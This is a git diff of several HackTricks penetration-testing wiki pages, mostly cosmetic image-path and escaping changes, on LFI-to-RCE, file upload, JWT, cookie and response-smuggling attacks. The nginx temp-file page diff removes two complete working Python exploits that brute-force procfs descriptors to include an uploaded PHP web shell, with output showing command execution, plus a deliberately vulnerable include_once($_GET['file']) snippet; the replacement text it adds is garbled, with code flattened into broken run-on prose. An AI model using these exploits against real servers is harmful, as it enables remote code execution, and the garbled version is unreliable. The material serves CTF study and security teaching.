+# LFI2RCE Via compress.zlib + PHP\_STREAM\_PREFER\_STUDIO + Path Disclosure
 
 <details>
 
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
 
-### [WhiteIntel](https://whiteintel.io)
+#### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,9 +26,9 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
-## `compress.zlib://` and `PHP_STREAM_PREFER_STDIO`
+### `compress.zlib://` and `PHP_STREAM_PREFER_STDIO`
 
 A file opened using the protocol `compress.zlib://` with the flag `PHP_STREAM_PREFER_STDIO` can continue writing data that arrives to the connection later to the same file.
 
@@ -52,7 +52,7 @@ You can see that info in this part of the php-src code in main/streams/cast.c:
     }
 ```
 
-## Race Condition to RCE
+### Race Condition to RCE
 
 [**This CTF**](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer) was solved using the previous trick.
 
@@ -66,9 +66,9 @@ However, there is a check in the web server that **prevents loading files that c
 
 For more information check the description of the Race Condition and the CTF in [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)
 
-### [WhiteIntel](https://whiteintel.io)
+#### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -87,9 +87,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
-
-
diff --git a/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md b/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md
index 3e3a617aa..73c6779e0 100644
--- a/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md
+++ b/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md
@@ -102,7 +102,7 @@ Then, the attacker could use those **100 connections** to perform a **search bru
 
 Yes, it's possible to generate 100000 temporary files in an EC2 medium size instance:
 
-<figure><img src="../../.gitbook/assets/image (237).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (240).png" alt=""><figcaption></figcaption></figure>
 
 {% hint style="warning" %}
 Note that in order to trigger the timeout it would be **enough to include the vulnerable LFI page**, so it enters in an eternal include loop.
diff --git a/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md b/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md
index 5192f8b74..89a094090 100644
--- a/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md
+++ b/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,276 +26,38 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
 ## Vulnerable configuration
 
-**[Example from https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)**
+[**Example from https://bierbaumer.net/security/php-lfi-with-nginx-assistance/**](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
 
 * PHP code:
 
-````h`
-<?php include_once($_GET['file']);
-```
+\`\`\`\`h\`
 
-* FPM / PHP config:
+/dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon\_inode:\[eventfd] lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:\[27587] lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:\[27589] lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:\[44926] lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:\[44927] lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted) ... \`\`\` Note: One cannot directly include \`/proc/34/fd/15\` in this example as PHP's \`include\` function would resolve the path to \`/var/lib/nginx/body/0000001368 (deleted)\` which doesn't exist in in the filesystem. This minor restriction can luckily be bypassed by some indirection like: \`/proc/self/fd/34/../../../34/fd/15\` which will finally execute the content of the deleted \`/var/lib/nginx/body/0000001368\` file. ## Full Exploit \`\`\`python #!/usr/bin/env python3 import sys, threading, requests # exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance # see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details URL = f'http://{sys.argv\[1]}:{sys.argv\[2]}/' # find nginx worker processes r = requests.get(URL, params={ 'file': '/proc/cpuinfo' }) cpus = r.text.count('processor') r = requests.get(URL, params={ 'file': '/proc/sys/kernel/pid\_max' }) pid\_max = int(r.text) print(f'\[\*] cpus: {cpus}; pid\_max: {pid\_max}') nginx\_workers = \[] for pid in range(pid\_max): r = requests.get(URL, params={ 'file': f'/proc/{pid}/cmdline' }) if b'nginx: worker process' in r.content: print(f'\[\*] nginx worker found: {pid}') nginx\_workers.append(pid) if len(nginx\_workers) >= cpus: break done = False # upload a big client body to force nginx to create a /var/lib/nginx/body/$X def uploader(): print('\[+] starting uploader') while not done: requests.get(URL, data=' //'
 
 ```
-...
-php_admin_value[session.upload_progress.enabled] = 0
-php_admin_value[file_uploads] = 0
-...
+    requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload)))))
+except:
+    pass
 ```
 
-* Setup / hardening:
+def send\_payload\_worker(requests\_session): while True: send\_payload(requests\_session)
 
-```bash
-...
-chown -R 0:0 /tmp /var/tmp /var/lib/php/sessions
-chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
-...
-```
+def send\_payload\_multiprocess(requests\_session): # Use all CPUs to send the payload as request body for Nginx for \_ in range(multiprocessing.cpu\_count()): p = multiprocessing.Process(target=send\_payload\_worker, args=(requests\_session,)) p.start()
 
-Luckily PHP is currently often deployed via PHP-FPM and Nginx. Nginx offers an easily-overlooked [client body buffering](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size) feature which will write temporary files if the client body (not limited to post) is bigger than a certain threshold.
+def generate\_random\_path\_prefix(nginx\_pids): # This method creates a path from random amount of ProcFS path components. A generated path will look like /proc/\<nginx pid 1>/cwd/proc/\<nginx pid 2>/root/proc/\<nginx pid 3>/root path = "" component\_num = random.randint(0, 10) for \_ in range(component\_num): pid = random.choice(nginx\_pids) if random.randint(0, 1) == 0: path += f"/proc/{pid}/cwd" else: path += f"/proc/{pid}/root" return path
 
-This feature allows LFIs to be exploited without any other way of creating files, if Nginx runs as the same user as PHP (very commonly done as www-data).
+def read\_file(requests\_session, nginx\_pid, fd, nginx\_pids): nginx\_pid\_list = list(nginx\_pids) while True: path = generate\_random\_path\_prefix(nginx\_pid\_list) path += f"/proc/{nginx\_pid}/fd/{fd}" try: d = requests\_session.get(SERVER + f"/?action=include\&file={path}").text except: continue # Flags are formatted as hxp{} if "hxp" in d: print("Found flag! ") print(d)
 
-Relevant Nginx code:
+def read\_file\_worker(requests\_session, nginx\_pid, nginx\_pids): # Scan Nginx FDs between 10 - 45 in a loop. Since files and sockets keep closing - it's very common for the request body FD to open within this range for fd in range(10, 45): thread = threading.Thread(target = read\_file, args = (requests\_session, nginx\_pid, fd, nginx\_pids)) thread.start()
 
-```c
-ngx_fd_t
-ngx_open_tempfile(u_char *name, ngx_uint_t persistent, ngx_uint_t access)
-{
-    ngx_fd_t  fd;
+def read\_file\_multiprocess(requests\_session, nginx\_pids): for nginx\_pid in nginx\_pids: p = multiprocessing.Process(target=read\_file\_worker, args=(requests\_session, nginx\_pid, nginx\_pids)) p.start()
 
-    fd = open((const char *) name, O_CREAT|O_EXCL|O_RDWR,
-              access ? access : 0600);
+if **name** == "**main**": print('\[DEBUG] Creating requests session') requests\_session = create\_requests\_session() print('\[DEBUG] Getting Nginx pids') nginx\_pids = get\_nginx\_pids(requests\_session) print(f'\[DEBUG] Nginx pids: {nginx\_pids}') print('\[DEBUG] Starting payload sending') send\_payload\_multiprocess(requests\_session) print('\[DEBUG] Starting fd readers') read\_file\_multiprocess(requests\_session, nginx\_pids)
 
-    if (fd != -1 && !persistent) {
-        (void) unlink((const char *) name);
-    }
-
-    return fd;
-}
-```
-
-It's visible that **tempfile is unlinked immediately** after being opened by Nginx. Luckily **procfs can be used to still obtain a reference** to the deleted file via a race:
-
-```
-...
-/proc/34/fd:
-total 0
-lrwx------ 1 www-data www-data 64 Dec 25 23:56 0 -> /dev/pts/0
-lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0
-lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon_inode:[eventfd]
-lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:[27587]
-lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:[27589]
-lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:[44926]
-lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927]
-lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted)
-...
-```
-
-Note: One cannot directly include `/proc/34/fd/15` in this example as PHP's `include` function would resolve the path to `/var/lib/nginx/body/0000001368 (deleted)` which doesn't exist in in the filesystem. This minor restriction can luckily be bypassed by some indirection like: `/proc/self/fd/34/../../../34/fd/15` which will finally execute the content of the deleted `/var/lib/nginx/body/0000001368` file.
-
-## Full Exploit
-
-```python
-#!/usr/bin/env python3
-import sys, threading, requests
-
-# exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance
-# see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details
-
-URL = f'http://{sys.argv[1]}:{sys.argv[2]}/'
-
-# find nginx worker processes 
-r  = requests.get(URL, params={
-    'file': '/proc/cpuinfo'
-})
-cpus = r.text.count('processor')
-
-r  = requests.get(URL, params={
-    'file': '/proc/sys/kernel/pid_max'
-})
-pid_max = int(r.text)
-print(f'[*] cpus: {cpus}; pid_max: {pid_max}')
-
-nginx_workers = []
-for pid in range(pid_max):
-    r  = requests.get(URL, params={
-        'file': f'/proc/{pid}/cmdline'
-    })
-
-    if b'nginx: worker process' in r.content:
-        print(f'[*] nginx worker found: {pid}')
-
-        nginx_workers.append(pid)
-        if len(nginx_workers) >= cpus:
-            break
-
-done = False
-
-# upload a big client body to force nginx to create a /var/lib/nginx/body/$X
-def uploader():
-    print('[+] starting uploader')
-    while not done:
-        requests.get(URL, data='<?php system($_GET["c"]); /*' + 16*1024*'A')
-
-for _ in range(16):
-    t = threading.Thread(target=uploader)
-    t.start()
-
-# brute force nginx's fds to include body files via procfs
-# use ../../ to bypass include's readlink / stat problems with resolving fds to `/var/lib/nginx/body/0000001150 (deleted)`
-def bruter(pid):
-    global done
-
-    while not done:
-        print(f'[+] brute loop restarted: {pid}')
-        for fd in range(4, 32):
-            f = f'/proc/self/fd/{pid}/../../../{pid}/fd/{fd}'
-            r  = requests.get(URL, params={
-                'file': f,
-                'c': f'id'
-            })
-            if r.text:
-                print(f'[!] {f}: {r.text}')
-                done = True
-                exit()
-
-for pid in nginx_workers:
-    a = threading.Thread(target=bruter, args=(pid, ))
-    a.start()
-```
-
-Output:
-
-```
-$ ./pwn.py 127.0.0.1 1337
-[*] cpus: 2; pid_max: 32768
-[*] nginx worker found: 33
-[*] nginx worker found: 34
-[+] starting uploader
-[+] starting uploader
-[+] starting uploader
-[+] starting uploader
-[+] starting uploader
-[+] starting uploader
-[+] starting uploader
-[+] starting uploader
-[+] starting uploader
-[+] starting uploader
-[+] starting uploader
-[+] starting uploader
-[+] starting uploader
-[+] starting uploader
-[+] starting uploader
-[+] starting uploader
-[+] brute loop restarted: 33
-[+] brute loop restarted: 34
-[!] /proc/self/fd/34/../../../34/fd/9: uid=33(www-data) gid=33(www-data) groups=33(www-data)
-```
-
-### Another Exploit
-
-This is from [https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/](https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/)
-
-```python
-import requests
-import threading
-import multiprocessing
-import threading
-import random
-
-SERVER = "http://localhost:8088"
-NGINX_PIDS_CACHE = set([34, 35, 36, 37, 38, 39, 40, 41])
-# Set the following to True to use the above set of PIDs instead of scanning:
-USE_NGINX_PIDS_CACHE = False
-
-def create_requests_session():
-    session = requests.Session()
-    # Create a large HTTP connection pool to make HTTP requests as fast as possible without TCP handshake overhead
-    adapter = requests.adapters.HTTPAdapter(pool_connections=1000, pool_maxsize=10000)
-    session.mount('http://', adapter)
-    return session
-
-def get_nginx_pids(requests_session):
-    if USE_NGINX_PIDS_CACHE:
-        return NGINX_PIDS_CACHE
-    nginx_pids = set()
-    # Scan up to PID 200
-    for i in range(1, 200):
-        cmdline = requests_session.get(SERVER + f"/?action=read&file=/proc/{i}/cmdline").text
-        if cmdline.startswith("nginx: worker process"):
-            nginx_pids.add(i)
-    return nginx_pids
-
-def send_payload(requests_session, body_size=1024000):
-    try:
-        # The file path (/bla) doesn't need to exist - we simply need to upload a large body to Nginx and fail fast
-        payload = '<?php system("/readflag"); ?> //'
-        requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload)))))
-    except:
-        pass
-
-def send_payload_worker(requests_session):
-    while True:
-        send_payload(requests_session)
-
-def send_payload_multiprocess(requests_session):
-    # Use all CPUs to send the payload as request body for Nginx
-    for _ in range(multiprocessing.cpu_count()):
-        p = multiprocessing.Process(target=send_payload_worker, args=(requests_session,))
-        p.start()
-
-def generate_random_path_prefix(nginx_pids):
-    # This method creates a path from random amount of ProcFS path components. A generated path will look like /proc/<nginx pid 1>/cwd/proc/<nginx pid 2>/root/proc/<nginx pid 3>/root
-    path = ""
-    component_num = random.randint(0, 10)
-    for _ in range(component_num):
-        pid = random.choice(nginx_pids)
-        if random.randint(0, 1) == 0:
-            path += f"/proc/{pid}/cwd"
-        else:
-            path += f"/proc/{pid}/root"
-    return path
-
-def read_file(requests_session, nginx_pid, fd, nginx_pids):
-    nginx_pid_list = list(nginx_pids)
-    while True:
-        path = generate_random_path_prefix(nginx_pid_list)
-        path += f"/proc/{nginx_pid}/fd/{fd}"
-        try:
-            d = requests_session.get(SERVER + f"/?action=include&file={path}").text
-        except:
-            continue
-        # Flags are formatted as hxp{<flag>}
-        if "hxp" in d:
-            print("Found flag! ")
-            print(d)
-
-def read_file_worker(requests_session, nginx_pid, nginx_pids):
-    # Scan Nginx FDs between 10 - 45 in a loop. Since files and sockets keep closing - it's very common for the request body FD to open within this range
-    for fd in range(10, 45):
-        thread = threading.Thread(target = read_file, args = (requests_session, nginx_pid, fd, nginx_pids))
-        thread.start()
-
-def read_file_multiprocess(requests_session, nginx_pids):
-    for nginx_pid in nginx_pids:
-        p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids))
-        p.start()
-
-if __name__ == "__main__":
-    print('[DEBUG] Creating requests session')
-    requests_session = create_requests_session()
-    print('[DEBUG] Getting Nginx pids')
-    nginx_pids = get_nginx_pids(requests_session)
-    print(f'[DEBUG] Nginx pids: {nginx_pids}')
-    print('[DEBUG] Starting payload sending')
-    send_payload_multiprocess(requests_session)
-    print('[DEBUG] Starting fd readers')
-    read_file_multiprocess(requests_session, nginx_pids)
 ```
 
 ## Labs
@@ -318,7 +80,7 @@ Their primary goal of WhiteIntel is to combat account takeovers and ransomware a
 
 You can check their website and try their engine for **free** at:
 
-{% embed url="https://whiteintel.io" %}
+<div data-gb-custom-block data-tag="embed" data-url='https://whiteintel.io'></div>
 
 <details>
 
@@ -332,4 +94,5 @@ Other ways to support HackTricks:
 * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
-</details>
\ No newline at end of file
+</details>
+```
diff --git a/pentesting-web/file-upload/README.md b/pentesting-web/file-upload/README.md
index 071a58d29..ce64766b6 100644
--- a/pentesting-web/file-upload/README.md
+++ b/pentesting-web/file-upload/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -118,7 +118,7 @@ The `.inc` extension is sometimes used for php files that are only used to **imp
 
 If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** So, as mentioned in the following image, upload the XML file to `$JETTY_BASE/webapps/` and expect the shell!
 
-![https://twitter.com/ptswarm/status/1555184661751648256/photo/1](<../../.gitbook/assets/image (1044).png>)
+![https://twitter.com/ptswarm/status/1555184661751648256/photo/1](<../../.gitbook/assets/image (1047).png>)
 
 ## **uWSGI RCE**
 
@@ -340,7 +340,7 @@ More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-frie
 * [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
 * [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
diff --git a/pentesting-web/hacking-jwt-json-web-tokens.md b/pentesting-web/hacking-jwt-json-web-tokens.md
index 891259401..4d7346a05 100644
--- a/pentesting-web/hacking-jwt-json-web-tokens.md
+++ b/pentesting-web/hacking-jwt-json-web-tokens.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -35,7 +35,7 @@ python3 jwt_tool.py -M at \
 
 If you are lucky the tool will find some case where the web application is incorrectly checking the JWT:
 
-![](<../.gitbook/assets/image (932).png>)
+![](<../.gitbook/assets/image (935).png>)
 
 Then, you can search the request in your proxy or dump the used JWT for that request using jwt\_ tool:
 
@@ -189,7 +189,7 @@ openssl x509 -pubkey -noout -in attacker.crt > publicKey.pem
 
 Then you can use for example [**jwt.io**](https://jwt.io) to create the new JWT with the **created public and private keys and pointing the parameter x5u to the certificate .crt created.**
 
-![](<../.gitbook/assets/image (953).png>)
+![](<../.gitbook/assets/image (956).png>)
 
 You can also abuse both of these vulns **for SSRFs**.
 
@@ -197,7 +197,7 @@ You can also abuse both of these vulns **for SSRFs**.
 
 This parameter may contain the **certificate in base64**:
 
-![](<../.gitbook/assets/image (1116).png>)
+![](<../.gitbook/assets/image (1119).png>)
 
 If the attacker **generates a self-signed certificate** and creates a forged token using the corresponding private key and replace the "x5c" parameter’s value with the newly generatedcertificate and modifies the other parameters, namely n, e and x5t then essentially the forgedtoken would get accepted by the server.
 
@@ -210,7 +210,7 @@ openssl x509 -in attacker.crt -text
 
 If the JWT has embedded a public key like in the following scenario:
 
-![](<../.gitbook/assets/image (619).png>)
+![](<../.gitbook/assets/image (624).png>)
 
 Using the following nodejs script it's possible to generate a public key from that data:
 
@@ -279,7 +279,7 @@ The token's expiry is checked using the "exp" Payload claim. Given that JWTs are
 
 {% embed url="https://github.com/ticarpi/jwt_tool" %}
 
-<figure><img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
diff --git a/pentesting-web/hacking-with-cookies/README.md b/pentesting-web/hacking-with-cookies/README.md
index 14ba363ca..bb057e489 100644
--- a/pentesting-web/hacking-with-cookies/README.md
+++ b/pentesting-web/hacking-with-cookies/README.md
@@ -111,11 +111,11 @@ It is important to note that cookies prefixed with `__Host-` are not allowed to
 
 So, one of the protection of `__Host-` prefixed cookies is to prevent them from being overwritten from subdomains. Preventing for example [**Cookie Tossing attacks**](cookie-tossing.md). In the talk [**Cookie Crumbles: Unveiling Web Session Integrity Vulnerabilities**](https://www.youtube.com/watch?v=F\_wAzF4a7Xg) ([**paper**](https://www.usenix.org/system/files/usenixsecurity23-squarcina.pdf)) it's presented that it was possible to set \_\_HOST- prefixed cookies from subdomain, by tricking the parser, for example, adding "=" at the beggining or at the beginig and the end...:
 
-<figure><img src="../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (6).png" alt=""><figcaption></figcaption></figure>
 
 Or in PHP it was possible to add **other characters at the beginning** of the cookie name that were going to be **replaced by underscore** characters, allowing to overwrite `__HOST-` cookies:
 
-<figure><img src="../../.gitbook/assets/image (4).png" alt="" width="373"><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (7).png" alt="" width="373"><figcaption></figcaption></figure>
 
 ## Cookies Attacks
 
diff --git a/pentesting-web/http-response-smuggling-desync.md b/pentesting-web/http-response-smuggling-desync.md
index 90619b5f4..8240edddf 100644
--- a/pentesting-web/http-response-smuggling-desync.md
+++ b/pentesting-web/http-response-smuggling-desync.md
@@ -30,7 +30,7 @@ HTTP/1.1 allows to ask for **different resources without needing to wait for pre
 
 However, there is a problem desynchronising the responses queue. If an attacker send a HTTP Response smuggling attack and the responses to the **initial request and the smuggled one are responded immediately**, the smuggled response won't be inserted inside the queue of the victim response but will **just be discarded as an error**.
 
-![](<../.gitbook/assets/image (630).png>)
+![](<../.gitbook/assets/image (633).png>)
 
 Therefore, it's needed that the **smuggled** **request** **takes more time to be processed** inside the back-end server. Therefore, by the time the smuggled request is processed, the communication with the attacker will be over.
 
@@ -38,9 +38,9 @@ If in this specific situation a **victim has sent a request** and the **smuggled
 
 Moreover, is the **attacker then perform a request** and the **legitimate response** to the **victim** request is **answered** **before** the attackers request. The **response to the victim is going to be sent to the attacker**, **stealing** the response to the victim (which can contains for example the header **Set-Cookie**).
 
-![](<../.gitbook/assets/image (1017).png>)
+![](<../.gitbook/assets/image (1020).png>)
 
-![](<../.gitbook/assets/image (716).png>)
+![](<../.gitbook/assets/image (719).png>)
 
 ### Multiple Nested Injections
 
@@ -64,11 +64,11 @@ As with HTTP Request Smuggling known payloads, you can **steal the victims reque
 
 First, the attacker send a payload containing a **final POST request with the reflected parameter** at the end and a large Content-Length
 
-![](<../.gitbook/assets/image (1050).png>)
+![](<../.gitbook/assets/image (1053).png>)
 
 Then, once the **initial request** (blue) was **processed** and **while** the **sleepy** one is being processed (yellow) the **next request that arrives from a victim** is going to be **appended in the queue just after the reflected parameter**:
 
-![](<../.gitbook/assets/image (791).png>)
+![](<../.gitbook/assets/image (794).png>)
 
 Then, the **victim** will **receive** the **response to the sleepy** request and if in the meantime the **attacker** **sent** **another** **request**, the **response from the reflected content request will be sent to him**.
 
@@ -82,21 +82,21 @@ There are interesting requests like **HEAD** request that are specified to not h
 
 Therefore, if an attacker **injects** a **HEAD** request, like in this images:
 
-![](<../.gitbook/assets/image (1104).png>)
+![](<../.gitbook/assets/image (1107).png>)
 
 Then, **once the blue one is responded to the attacker**, the next victims request is going to be introduced in the queue:
 
-![](<../.gitbook/assets/image (996).png>)
+![](<../.gitbook/assets/image (999).png>)
 
 Then, the **victim** will **receive** the **response** from the **HEAD** request, which is **going to contain a Content-Length but no content at all**. Therefore, the proxy **won't send this response** to the victim, but will **wait** for some **content**, which actually is going to be **response to the yellow request** (also injected by the attacker):
 
-![](<../.gitbook/assets/image (732).png>)
+![](<../.gitbook/assets/image (735).png>)
 
 ### Content Confusion
 
 Following the previous example, knowing that you can **control the body** of the request whose response is going to receive the victim and that a **HEAD** **response** usually contains in its headers the **Content-Type and the Content-Length**, you can **send a request like the following** one to **cause XSS** in the victim without the page being vulnerable to XSS:
 
-![](<../.gitbook/assets/image (685).png>)
+![](<../.gitbook/assets/image (688).png>)
 
 ### Cache Poisoning
 
@@ -104,11 +104,11 @@ Abusing the previously commented response desynchronisation Content Confusion at
 
 Malicious request containing the XSS payload:
 
-![](<../.gitbook/assets/image (611).png>)
+![](<../.gitbook/assets/image (614).png>)
 
 Malicious response to the victim that contains the header that indicates to the cache to store the response:
 
-![](<../.gitbook/assets/image (563).png>)
+![](<../.gitbook/assets/image (566).png>)
 
 {% hint style="warning" %}
 Note that in this case if the **"victim" is the attacker** he can now perform **cache poisoning in arbitrary URLs** as he can **control the URL that is going to be cached** with the malicious response.
@@ -118,7 +118,7 @@ Note that in this case if the **"victim" is the attacker** he can now perform **
 
 This attack is similar to the previous one, but **instead of injecting a payload inside the cache, the attacker will be caching victim information inside of the cache:**
 
-![](<../.gitbook/assets/image (988).png>)
+![](<../.gitbook/assets/image (991).png>)
 
 ### Response Splitting
 
@@ -128,15 +128,15 @@ In order to achieve this, the attacker needs to find an endpoint of the web appl
 
 He will send a **exploit** like:
 
-![](<../.gitbook/assets/image (908).png>)
+![](<../.gitbook/assets/image (911).png>)
 
 After the first request is resolved and sent back to the attacker, the **victims request is added into the queue**:
 
-![](<../.gitbook/assets/image (734).png>)
+![](<../.gitbook/assets/image (737).png>)
 
